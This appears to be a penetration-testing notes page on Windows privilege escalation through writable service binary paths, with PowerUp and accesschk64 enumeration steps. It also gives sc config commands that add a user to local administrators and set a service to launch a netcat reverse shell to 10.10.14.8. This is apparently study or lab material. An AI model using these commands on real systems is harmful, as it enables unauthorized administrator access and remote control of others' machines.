Binary Paths

Overview

Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the binary path (executable file) to a malicious one.

Exploitation using PowerUp

Run PowerUp on machine

. .\PowerUp.ps1
Invoke-AllChecks

Change the binary path

sc config daclsvc binpath= "net localgroup administrators Greg /add"
sc config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337"

Start service

sc start dacl

Exploitation via Accesschk64

Check for services with write permissions

accesschk64.exe --accept-eula -uwcv Everyone *

accesschk64.exe -uwcv daclsvc

Query the service

sc qc daclsvc

Changing the binary path is the same as the last method

PreviousService Permissions NextUnquoted Service Paths

Last updated 10 months ago

Was this helpful?